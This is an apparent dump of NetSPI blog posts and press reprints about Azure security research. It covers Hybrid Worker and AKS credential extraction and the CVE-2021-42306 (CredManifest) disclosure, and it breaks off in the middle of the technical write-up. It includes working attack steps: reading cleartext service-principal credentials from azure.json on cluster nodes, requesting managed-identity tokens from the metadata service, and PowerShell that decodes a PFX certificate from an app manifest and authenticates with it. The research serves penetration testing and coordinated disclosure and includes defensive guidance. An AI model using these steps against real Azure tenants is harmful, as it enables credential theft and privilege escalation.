Since this issue ultimately relies on an Azure administrator giving a user access to specific VMs (the Hybrid Workers), it’s considered a user misconfiguration issue. Microsoft has updated their documentation to reflect the potential impact of installing the “Run as” certificate on the VMs. Additionally, you could also modify the certificate installation process to mark the certificates as “non-exportable” to help protect them.

Note: Microsoft has updated their documentation to reflect the potential impact of installing the “Run as” certificate on the VMs.

We would recommend against using “Run as” accounts for Automation Accounts and instead switch to using managed identities on the Hybrid Worker VMs.

Stay tuned to the NetSPI technical blog for the second half of this series that will outline how we were able to use a Reader role account to extract credentials and certificates from Automation Accounts. In subscriptions where Run As accounts were in use, this resulted in a Reader to Contributor privilege escalation.

Prior Work

While we were working on these blogs, the Azsec blog put out the “Laterally move by abusing Log Analytics Agent and Automation Hybrid worker” post that outlines some similar techniques to what we’ve outlined above. Read the post to see how they make use of Log Analytics to gain access to the Hybrid Worker groups.

[post_title] => Abusing Azure Hybrid Workers for Privilege Escalation – Part 1 [post_excerpt] => In this cloud penetration testing blog, learn how to abuse Azure Hybrid Workers for privilege escalation. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => abusing-azure-hybrid-workers-for-privilege-escalation [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:20:54 [post_modified_gmt] => 2023-03-16 14:20:54 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27487 [menu_order] => 289 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 27255 [post_author] => 10 [post_date] => 2022-01-27 09:00:00 [post_date_gmt] => 2022-01-27 15:00:00 [post_content] =>

As more applications move to a container-based model, we are running into more instances of Azure Kubernetes Services (AKS) being used in Azure subscriptions. The service itself can be complicated and have a large attack surface area. In this post we will focus on how to extract credentials from the AKS service in Azure, using the Contributor role permissions on an AKS cluster.

While we won’t explain how Kubernetes works, we will use some common terms throughout this post. It may be helpful to have this Kubernetes glossary open in another tab for reference. Additionally, we will not cover how to collect the Kubernetes “Secrets” from the service or how to review pods/containers for sensitive information. We’ll save those topics for a future post.

What is Azure Kubernetes Service (AKS)?

In the simplest terms, the AKS service is an Azure resource that allows you to run a Kubernetes cluster in Azure. When created, the AKS cluster resource consists of sub-resources (in a special resource group) that support running the cluster. These sub-resources, and attached cluster, allow you to orchestrate containers and set up Kubernetes workloads. As a part of the orchestration process, the cluster needs to be assigned an identity (a Service Principal or a Managed Identity) in the Azure tenant. 

Service Principal versus Managed Identity

When provisioning an AKS cluster, you will have to choose between authenticating with a Service Principal or a System-assigned Managed Identity. By default, the Service Principal that is assigned to the cluster will get the ACRPull role assigned at the subscription scope level. While it’s not a guarantee, by using an existing Service Principal, the attached identity may also have additional roles already assigned in the Azure tenant.

In contrast, a newly created System-assigned Managed Identity on an AKS cluster will not have any assigned roles in a subscription. To further complicate things, the “System-assigned” Managed Identity is actually a “User-assigned” Managed Identity that’s created in the new Resource Group for the Virtual Machine Scale Set (VMSS) cluster resources. There’s no “Identity” menu in the AKS portal blade, so it’s my understanding that the User-assigned Managed Identity is what gets used in the cluster. Each of these authentication methods have their benefits, and we will have different approaches to attacking each one.

Cluster Infrastructure

In order to access the credentials (Service Principal or Managed Identity) associated with the cluster, we will need to execute commands on the cluster. This can be done by using an authenticated kubectl session (which we will explore in the Gathering kubectl Credentials section), or by executing commands directly on the VMSS instances that support the cluster. 

When a new cluster is created in AKS, a new resource group is created in the subscription to house the supporting resources. This new resource group is named after the resource group that the AKS resource was created under, and the name of the cluster. 

For example, a cluster named “testCluster” that was deployed in the East US region and in the “tester” resource group would have a new resource group that was created named “MC_tester_testCluster_eastus”.

This resource group will contain the VMSS, some supporting resources, and the Managed Identities used by the cluster.

For example, a cluster named “testCluster” that was deployed in the East US region and in the “tester” resource group would have a new resource group that was created named “MC_tester_testCluster_eastus”.

Gathering Service Principal Credentials

First, we will cover clusters that are configured with a Service Principal credential. As part of the configuration process, Azure places the Service Principal credentials in cleartext into the “/etc/kubernetes/azure.json” file on the cluster. According to the Microsoft documentation, this is by design, and is done to allow the cluster to use the Service Principal credentials. There are legitimate uses of these credentials, but it always feels wrong finding them available in cleartext.

In order to get access to the azure.json file, we will need to run a command on the cluster to “cat” out the file from the VMSS instance and return the command output.

The VMSS command execution can be done via the following options:

The Az PowerShell method is what is used in Get-AzPasswords, but you could manually use any of the above methods.

In Get-AzPasswords, this command execution is done by using a local command file (.\tempscript) that is passed into the Invoke-AzVmssVMRunCommand function. The command output is then parsed with some PowerShell and exported to the output table for the Get-AzPasswords function. 

Learn more about how to use Get-AzPasswords in my blog, Get-AzPasswords: Encrypting Automation Password Data.

Privilege Escalation Potential

There is a small issue here: Contributors on the subscription can gain access to a Service Principal credential that they are not the owner of. If the Service Principal has additional permissions, it could allow the contributor to escalate privileges.

In this example:

  • User A creates a Service Principal (AKS-SP), generates a password for it, and retains the “Owner” role on the Service Principal in Azure AD
  • User A creates the AKS cluster (Test cluster) and assigns it the Service Principal credentials
  • User B runs commands to extract credentials from the VMSS instance that runs the AKS cluster
  • User B now has cleartext credentials for a Service Principal (AKS-SP) that they do not have Owner rights on

This is illustrated in the diagram below.

Privilege Escalation Potential diagram

For all of the above, assume that both User A and B have the Contributor role on the subscription, and no additional roles assigned on the Azure AD tenant. Additionally, this attack could extend to the VM Contributor role and other roles that can run commands on VMSS instances (Microsoft.Compute/virtualMachineScaleSets/virtualMachines/runCommand/action).

Gathering Managed Identity Credentials

If the AKS cluster is configured with a Managed Identity, we will have to use the metadata service to get a token. We have previously covered this general process in the following blogs:

In this case, we will be using the VMSS command execution functionality to make a request to “https://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/”. This will return a JWT that is scoped to the management.azure.com domain.

For the AKS functionality in Get-AzPasswords, we currently have the token scoped to management.azure.com. If you would like to generate tokens for other scopes (i.e., Key Vaults), you can either modify the function in the PowerShell code or run the VMSS commands separately. Right now, this is a pending issue on the MicroBurst GitHub, so it is on the radar for future updates.

At this point we can use the token to gather information about the environment by using the Get-AzDomainInfoREST function from MicroBurst, written by Josh Magri at NetSPI. Keep in mind that the Managed Identity may not have any real roles applied, so your mileage may vary with the token usage. Given the Key Vault integrations with AKS, you may also have luck using Get-AzKeyVaultKeysREST or Get-AzKeyVaultSecretsREST from the MicroBurst tools, but you will need to request a Key Vault scoped token.

Gathering kubectl Credentials

As a final addition to the AKS section of Get-AzPasswords, we have added the functionality to generate kubeconfig files for authenticating with the kubectl tool. These config files allow for ongoing administrator access to the AKS environment, so they’re great for persistence.

Generating the config files can be complicated. The Az PowerShell module does not natively support this action, but the Az CLI and REST APIs do. Since we want to keep all the actions in Get-AzPasswords compatible with the Az PowerShell cmdlets, we ended up using a token (generated with Get-AzAccessToken) and making calls out to the REST APIs to generate the configuration. This prevents us from needing the Az CLI as an additional dependency.

Once the config files are created, you can replace your existing kubeconfig file on your testing system and you should have access to the AKS cluster. Ultimately, this will be dependent on the AKS cluster being available from your network location.

Conclusion

As a final note on these Get-AzPasswords additions, we have run all the privilege escalation scenarios past MSRC for review. They have confirmed that these issues (Cleartext Credentials, Non-Owner Credential Access, and Role/Service Boundary Crossing) are all expected behaviors of the AKS service in a subscription.

For the defenders reading this, Microsoft Security Center should have alerts for Get-AzPasswords activity, but you can specifically monitor for these indicators of compromise (IoCs) in your Azure subscription logs:

  • VMSS Command Execution
  • Issuing of Metadata tokens for Managed Identities
  • Generation of kubeconfig files

For those that want to try this on their own AKS cluster, the Get-AzPasswords function is available as part of the MicroBurst toolkit.

Need help securing your Azure cloud environment? Learn more about NetSPI’s Azure Penetration Testing services.

[post_title] => How To Extract Credentials from Azure Kubernetes Service (AKS) [post_excerpt] => In this penetration testing blog, we explain how to extract credentials from the Azure Kubernetes Service (AKS) using the Contributor role permissions on an AKS cluster. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => extract-credentials-from-azure-kubernetes-service [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:22:34 [post_modified_gmt] => 2023-03-16 14:22:34 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27255 [menu_order] => 308 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 26753 [post_author] => 10 [post_date] => 2021-11-23 13:16:00 [post_date_gmt] => 2021-11-23 19:16:00 [post_content] =>

On November 23, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Iain Thomson for The Register. Read the full article below or online here.

Microsoft has fixed a flaw in Azure that, according to the infosec firm that found and privately reported the issue, could be exploited by a rogue user within an Azure Active Directory instance "to escalate up to a Contributor role."

"If access to the Azure Contributor role is achieved, the user would be able to create, manage, and delete all types of resources in the affected Azure subscription," NetSPI said of the vulnerability, labeled CVE-2021-42306.

Essentially, an employee at a company using Azure Active Directory, for instance, could end up exploiting this bug to ruin an IT department or CISO's month. Microsoft said last week it fixed the problem within Azure:

Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers.

We have conducted an investigation and have found no evidence of malicious access to this data.

Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.

"The discovery of this vulnerability," said NetSPI's Karl Fosaaen, who found the security hole, "highlights the importance of the shared responsibility model among cloud providers and customers. It’s vital for the security community to put the world’s most prominent technologies to the test."

[post_title] => The Register: Microsoft squashes Azure privilege-escalation bug [post_excerpt] => On November 23, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Iain Thomson for The Register. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-register-microsoft-squashes-azure-privilege-escalation-bug [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:42 [post_modified_gmt] => 2022-12-16 16:51:42 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26753 [menu_order] => 335 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 26727 [post_author] => 10 [post_date] => 2021-11-18 18:47:00 [post_date_gmt] => 2021-11-19 00:47:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Jay Ferron for ChannelPro Network. Read the full article below or online here.

Microsoft recently mitigated an information disclosure issue, CVE-2021-42306, to prevent private key data from being stored by some Azure services in the keyCredentials property of an Azure Active Directory (Azure AD) Application and/or Service Principal, and prevent reading of private key data previously stored in the keyCredentials property.

The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata.

The property is designed to accept a certificate with public key data for use in authentication, but certificates with private key data could have also been incorrectly stored in the property. Access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal.

Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers. We have conducted an investigation and have found no evidence of malicious access to this data.

Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.

As a result, clear text private key material in the keyCredentials property is inaccessible, mitigating the risks associated with storage of this material in the property.

As a precautionary measure, Microsoft is recommending customers using these services take action as described in “Affected products/services,” below. We are also recommending that customers who suspect private key data may have been added to credentials for additional Azure AD applications or Service Principals in their environments follow this guidance.

Affected products/services

Microsoft has identified the following platforms/services that stored their private keys in the public property. We have notified customers who have impacted Azure AD applications created by these services and notified them via Azure Service Health Notifications to provide remediation guidance specific to the services they use.

Product/ServiceMicrosoft’s MitigationCustomer impact assessment and remediation
Azure Automation uses the Application and Service Principal keyCredential APIs when Automation Run-As Accounts are createdAzure Automation deployed an update to the service to prevent private key data in clear text from being uploaded to Azure AD applications. Run-As accounts created or renewed after 10/15/2021 are not impacted and do not require further action.Automation Run As accounts created with an Azure Automation self-signed certificate between 10/15/2020 and 10/15/2021 that have not been renewed are impacted. Separately customers who bring their own certificates could be affected. This is regardless of the renewal date of the certificate.

To identify and remediate impacted Azure AD applications associated with impacted Automation Run-As accounts, please navigate to this Github Repo.

In addition, Azure Automation supports Managed Identities Support (GA announced on October 2021). Migrating to Managed Identities from Run-As will mitigate this issue. Please follow the guidance here to migrate.
Azure Migrate service creates Azure AD applications to enable Azure Migrate appliances to communicate with the service’s endpoints.Azure Migrate deployed an update to prevent private key data in clear text from being uploaded to Azure AD applications.

Azure Migrate appliances that were registered after 11/02/2021 and had Appliance configuration manager version 6.1.220.1 and above are not impacted and do not require further action.
Azure Migrate appliances registered prior to 11/02/2021 and/or appliances registered after 11/02/2021 where auto-update was disabled could be affected by this issue.

To identify and remediate any impacted Azure AD applications associated with Azure Migrate appliances, please navigate to this link.
Azure Site Recovery (ASR) creates Azure AD applications to communicate with the ASR service endpoints.Azure Site Recovery deployed an update to prevent private keydata from being uploaded to Azure AD applications. Customers using Azure Site Recovery’s preview experience “VMware to Azure Disaster Recovery” after 11/01/2021 are not impacted and do not require further action.Customers who have deployed and registered the preview version of VMware to Azure DR experience with ASR before 11/01/2021 could be affected.

To identify and remediate the impacted AAD Apps associated with Azure Site Recovery appliances, please navigate to this link.
Azure AD applications and Service Principals [1]Microsoft has blocked reading private key data as of 10/30/2021.Follow the guidance available at aad-app-credential-remediation-guide to assess if your application key credentials need to be rotated. The guidance walks through the assessment steps to identify if private key information was stored in keyCredentials and provides remediation options for credential rotation.

[1] This issue only affects Azure AD Applications and Service Principals where private key material in clear text was added to a keyCredential. Microsoft recommends taking precautionary steps to identify any additional instances of this issue in applications where you manage credentials and take remediation steps if impact is found.

What else can I do to audit and investigate applications for unexpected use?

Additionally, as a best practice, we recommend auditing and investigating applications for unexpected use:

  • Audit the permissions that have been granted to the impacted entities (e.g., subscription access, roles, OAuth permissions, etc.) to assess impact in case the credentials were exposed. Refer to the Application permission section in the security operations guide.
  • If you rotated the credential for your application/service principal, we suggest investigating for unexpected use of the impacted entity especially if it has high privilege permissions to sensitive resources. Additionally, review the security guidance on least privilege access for apps to ensure your applications are configured with least privilege access.
  • Check sign-in logs, AAD audit logs and M365 audit logs, for anomalous activity like sign-ins from unexpected IP addresses.
  • Customers who have Microsoft Sentinel deployed in their environment can leverage notebook/playbook/hunting queries to look for potentially malicious activities. Look for more guidance here.
  • For more information refer to the security operations guidance.

Part of any robust security posture is working with researchers to help find vulnerabilities, so we can fix any findings before they are misused. We want to thank Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe.

[post_title] => ChannelPro Network: Azure Active Directory (AD) KeyCredential Property Information Disclosure [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Jay Ferron for ChannelPro Network. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => channelpro-network-azure-active-directory-ad-keycredential-property-information-disclosure [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:43 [post_modified_gmt] => 2022-12-16 16:51:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26727 [menu_order] => 338 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 26733 [post_author] => 10 [post_date] => 2021-11-18 17:26:00 [post_date_gmt] => 2021-11-18 23:26:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Pierluigi Paganini for Security Affairs. Read the full article below or online here.

Microsoft has recently addressed an information disclosure vulnerability, tracked as CVE-2021-42306, affecting Azure AD.

“An information disclosure vulnerability manifests when a user or an application uploads unprotected private key data as part of an authentication certificate keyCredential  on an Azure AD Application or Service Principal (which is not recommended). This vulnerability allows a user or service in the tenant with application read access to read the private key data that was added to the application.” reads the advisory published by Microsoft. “Azure AD addressed this vulnerability by preventing disclosure of any private key values added to the application. Microsoft has identified services that could manifest this vulnerability, and steps that customers should take to be protected. Refer to the FAQ section for more information.”

The vulnerability was discovered by Karl Fosaaen from NetSPI, it received a CVSS score of 8.1. Fosaaen explained that due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) ended up being stored in clear text in Azure AD and anyone with access to information on App Registrations can access them.

An attacker could use these credentials to authenticate as the App Registration, typically as a Contributor on the subscription containing the Automation Account.

“This issue stems from the way the Automation Account “Run as” credentials are created when creating a new Automation Account in Azure. There appears to have been logic on the Azure side that stores the full PFX file in the App Registration manifest, versus the associated public key.” reads the analysis published by NetSPI.

An attacker can exploit this flaw to escalate privileges to Contributor of any subscription that has an Automation Account, then access resources in the affected subscriptions, including sensitive information stored in Azure services and credentials stored in key vaults.

The issue could be potentially exploited to disable or delete resources and take entire Azure tenants offline.

Microsoft addressed the flaw by preventing Azure services from storing clear text private keys in the keyCredentials property and by preventing users from reading any private key data that has been stored in clear text.

[post_title] => Security Affairs: Microsoft addresses a high-severity vulnerability in Azure AD [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Pierluigi Paganini for Security Affairs. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => security-affairs-microsoft-addresses-a-high-severity-vulnerability-in-azure-ad [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:43 [post_modified_gmt] => 2022-12-16 16:51:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26733 [menu_order] => 337 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [15] => WP_Post Object ( [ID] => 26728 [post_author] => 10 [post_date] => 2021-11-18 16:14:00 [post_date_gmt] => 2021-11-18 22:14:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. Read the full article below or online here.

Microsoft announced on Wednesday that it fixed an Azure Active Directory private key data storage gaffe that affects Azure application subscribers, but affected organizations nonetheless should carry out specific assessment and remediation tasks.

Affected organizations were notified via the Azure Service Health Notifications message center, Microsoft indicated.

"We have notified customers who have impacted Azure AD applications created by these services and notified them via Azure Service Health Notifications to provide remediation guidance specific to the services they use."

The applications requiring investigation include Azure Automation (when used with "Run-As Accounts"), Azure Migrate, Azure Site Recovery, and Azure AD Applications and Service Principals. Microsoft didn't find evidence that the vulnerability was exploited, but advised organizations to conduct audits and investigate Azure apps for any permissions that may have been granted.

Microsoft also urged IT pros to enforce least-privilege access for apps and check the "sign-in logs, AAD audit logs and M365 audit logs for anomalous activity like sign-ins from unexpected IP addresses."

Private Key Data Exposed

The problem, in essence, was that Microsoft's Azure app installation processes were including private key data in a property used for public keys. The issue was initially flagged as CVE-2021-42306, an information disclosure vulnerability associated with Azure AD's keyCredentials property. Any user in an Azure AD tenancy can read the keyCredentials property, Microsoft's announcement explained:

The keyCredentials property is used to configure an application's authentication credentials. It is accessible to any user or service in the organization's Azure AD tenant with read access to application metadata.

The keyCredential's property is supposed to just work with public keys, but it was possible to store private key data in it, too, and that's where the Microsoft Azure app install processes blundered.

"Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers," Microsoft explained.

The Microsoft Security Response Center (MSRC) credited the discovery of the issue to "Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe," the announcement indicated. 

Contributor Role Rights

The magnitude of the problem was explained in a NetSPI press release. NetSPI specializes in penetration testing and attack surface reduction services for organizations.

An exploit of the CVE-2021-42306 vulnerability could give an attacker Azure Contributor role rights, with the ability to "create, manage, and delete all types of resources in the affected Azure subscription," NetSPI explained. An attacker would have access to "all of the resources in the affected subscriptions," including "credentials stored in key vaults."

NetSPI's report on the vulnerability, written by Karl Fosaaen, NetSPI's practice director, described the response by the MSRC as "one of the fastest" he's seen. Fosaaen had initially sent his report to the MSRC on Oct. 7, 2021.

Fosaaen advised following MSRC's advice, but added a cautionary note.

"Although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account 'Run as' certificates," he wrote. "Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised." 

Microsoft offers a script from this GitHub page that will check for affected apps, as noted by Microsoft Program Manager Merill Fernando in this Twitter post

[post_title] => Redmond: Microsoft Fixes Azure Active Directory Issue Exposing Private Key Data [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => redmond-microsoft-fixes-azure-active-directory-issue-exposing-private-key-data [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26728 [menu_order] => 339 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 26730 [post_author] => 10 [post_date] => 2021-11-18 15:19:00 [post_date_gmt] => 2021-11-18 21:19:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Octavio Mares for Information Security Newspaper. Read the full article below or online here.

This week, Microsoft reported the detection of a sensitive information leak vulnerability that affects many Azure Active Directory (AD) deployments. The flaw was tracked as CVE-2021-42306 and received a score of 8.1/10 according to the Common Vulnerability Scoring System (CVSS).

According to the report, incorrect configuration in Azure allows “Run As” credentials in the automation account to be stored in plain text, so any user with access to application registration information could access this information, including threat actors.

CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory

The flaw was identified by researchers at cybersecurity firm NetSPI, who mention that an attacker could exploit this condition to perform privilege escalation on any affected implementation. The risk is also present for credentials stored in key vaults and any information stored in Azure services, experts say.

Apparently, the flaw is related to the keyCredentials property, designed to configure authentication credentials for applications. Microsoft said: “Some Microsoft services incorrectly store private key data in keyCredentials while building applications on behalf of their customers. At the moment there is no evidence of malicious access to this data.”

The company notes that the vulnerability was fixed by preventing Azure services from storing private keys in plain text in keyCredentials, as well as preventing users from accessing any private key data incorrectly stored in this format: “Private keys in keyCredentials are inaccessible, which mitigates the risk associated with storing this information,” Microsoft concludes.

Microsoft also mentions that all Automation Run As accounts that were created with Azure Automation certificates between October 15, 2020 and October 15, 2021 are affected by this flaw. Azure Migrate services and customers who deployed VMware preview in the Azure disaster recovery experience with Azure Site Recovery (ASR) could also be vulnerable.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

[post_title] => Information Security Newspaper: Very Critical Information Disclosure Vulnerability in Azure Active Directory (AD). Patch Immediately [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => information-security-newspaper-very-critical-information-disclosure-vulnerability-in-azure-active-directory-ad-patch-immediately [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26730 [menu_order] => 340 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [17] => WP_Post Object ( [ID] => 26710 [post_author] => 10 [post_date] => 2021-11-18 14:34:36 [post_date_gmt] => 2021-11-18 20:34:36 [post_content] =>

On November 18, 2021, NetSPI Practice Director Karl Fosaaen was featured in an article on The Stack. Read the full article below or online here.

A critical Azure Active Directory vulnerability (CVE-2021-42361) left user credentials stored in easily accessible plain text – a bug that could have let attackers make themselves a contributor to the affected Azure AD subscription, creating, managing and deleting resources across the cloud-based IAM service; which, abused, hands a potentially terrifying amount of control to any bad actor who’s gained access.

The Azure Active Directory vulnerability resulted in private key data being stored in plaintext by four key Azure services in the keyCredentials property of an Azure AD application. (The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata, Microsoft noted in its write-up.)

Azure Automation, Azure Migrate, Azure Site Recovery and Azure applications and Service Principals were all storing their private keys visibily in the public property Microsoft admitted.

“Automation Account ‘Run as’ credentials (PFX certificates) were being stored in cleartext, in Azure Active Directory (AAD). These credentials were available to anyone with the ability to read information about App Registrations (typically most AAD users)” said attack surface management specialist NetSPI.

The bug was spotted and reported by security firm NetSPI’s practice director Karl Fosaaen.

(His technically detailed write-up can be seen here.)

Microsoft gave it a CVSS score of 8.1 and patched it on November 17 in an out-of-band security update.

By selecting the display name, we can then see the details for the App Registration and navigate to the “Manifest” section. Within this section, we can see the “keyCredentials”.

Impacted Azure services have now deployed updates that prevent clear text private key data from being stored during application creation, and Azure AD deployed an update that prevents access to private key data that has previously been stored. NetSPI’s Fosaaen warned however that “although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account ‘Run as’ certificates. Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised.”

There’s no evidence that the bug has been publicly exploited and it would require basic authorisation, but for a motivated attacker it would have represented a significant weapon in their cloud-exploitation arsenal and raises questions about QA at Microsoft given the critical nature of the exposure.

Microsoft described the Azure Active Directory vulnerability in its security update as “an information disclosure vulnerability [that] manifests when a user or an application uploads unprotected private key data as part of an authentication certificate keyCredential  on an Azure AD Application or Service Principal….

“This vulnerability allows a user or service in the tenant with application read access to read the private key data that was added to the application” it added.

In a separate blog by Microsoft Security Response Center the company noted that “access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal” — something illustrated and automated by NetSPI’s Karl Fosaaen.

It’s not Azure’s first serious security issue this year: security researchers at Israel’s Wix in August 2021 found a critical vulnerability in its flagship CosmosDB database that gave them full admin access for major Microsoft customers including several Fortune 500 multinationals. They warned at the time that the “series of flaws in a Cosmos DB feature created a loophole allowing any user to download, delete or manipulate a massive collection of commercial databases, as well as read/write access to the underlying architecture of Cosmos DB.”

[post_title] => The Stack: “Keys to the cloud” stored in plain text in Azure AD in major hyperscaler blooper [post_excerpt] => On November 18, 2021, NetSPI Practice Director Karl Fosaaen was featured in an article on The Stack. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-stack-keys-to-the-cloud-stored-in-plain-text-in-azure-ad-in-major-hyperscaler-blooper [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26710 [menu_order] => 341 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [18] => WP_Post Object ( [ID] => 26684 [post_author] => 10 [post_date] => 2021-11-17 14:13:03 [post_date_gmt] => 2021-11-17 20:13:03 [post_content] =>

Introduction

Occasionally, we find something in an environment that just looks off. It’s not always abundantly clear why it looks wrong, but clear that a deeper understanding is required. This was the case with seeing Base64 certificate data (“MII…” strings) stored with App Registration “manifests” in Azure Active Directory.

In this blog, we will share the technical details on how we found and reported CVE-2021-42306 (CredManifest) to Microsoft. In addition to Microsoft’s remediation guidance, we’ll explain the remediation steps organizations can take to protect their Azure environments.

So, what does this mean for your organization? Read our press release to explore the business impact of the issue.

TL;DR

Due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) were being stored in cleartext, in Azure Active Directory (AAD). These credentials were available to anyone with the ability to read information about App Registrations (typically most AAD users). These credentials could then be used to authenticate as the App Registration, typically as a Contributor on the subscription containing the Automation Account.

The Source of the Issue

This issue stems from the way the Automation Account “Run as” credentials are created when creating a new Automation Account in Azure. There appears to have been logic on the Azure side that stores the full PFX file in the App Registration manifest, versus the associated public key.

We can see this by creating a new Automation Account with a “Run as” account in our test tenant. As an integrated part of this process, we are assigning the Contributor role to the “Run as” account, so we will need to use an account with the Owner role to complete this step. We will use the “BlogExample” Automation Account as our example:

Add Automation Account

Take note that we are also selecting the “Create Azure Run As account” setting as “Yes” for this example. This will create a new service principal account that the Automation Account can use within running scripts. By default, this service principal will also be granted the Contributor role on the subscription that the Automation Account is created in.

We’ve previously covered Automation Accounts on the NetSPI technical blog, so hopefully this is all a refresher. For additional information on Azure Automation Accounts, read:

New Azure Run As account (service principal) created

Once the Automation and “Run as” Accounts are created, we can then see the new service principal in the App Registrations section of the Azure Active Directory blade in the Portal.

Once the Automation and “Run as” Accounts are created, we can then see the new service principal in the App Registrations section of the Azure Active Directory blade in the Portal.

By selecting the display name, we can then see the details for the App Registration and navigate to the “Manifest” section. Within this section, we can see the “keyCredentials”.

By selecting the display name, we can then see the details for the App Registration and navigate to the “Manifest” section. Within this section, we can see the “keyCredentials”.

The “value” parameter is the Base64 encoded string containing the PFX certificate file that can be used for authentication. Before we can authenticate as the App Registration, we will need to convert the Base64.

Manual Extraction of the Credentials

For the proof of concept, we will copy the certificate data out of the manifest and convert it to a PFX file.

This can be done with two lines of PowerShell:

$testcred = "MIIJ/QIBAzCCC[Truncated]="

[IO.File]::WriteAllBytes("$PWD\BlogCert.pfx",[Convert]::FromBase64String($testcred))

This will decode the certificate data to BlogCert.pfx in your current directory.

Next, we will need to import the certificate to our local store. This can also be done with PowerShell (in a local administrator session):

Import-PfxCertificate -FilePath "$PWD\BlogCert.pfx" -CertStoreLocation Cert:\LocalMachine\My
Next, we will need to import the certificate to our local store. This can also be done with PowerShell (in a local administrator session).

Finally, we can use the newly installed certificate to authenticate to the Azure subscription as the App Registration. This will require us to know the Directory (Tenant) ID, App (Client) ID, and Certificate Thumbprint for the App Registration credentials. These can be found in the “Overview” menu for the App Registration and the Manifest. 

In this example, we’ve cast these values to PowerShell variables ($thumbprint, $tenantID, $appId).

With these values available, we can then run the Add-AzAccount command to authenticate to the tenant. 

Add-AzAccount -ServicePrincipal -Tenant $tenantID -CertificateThumbprint $thumbprint -ApplicationId $appId
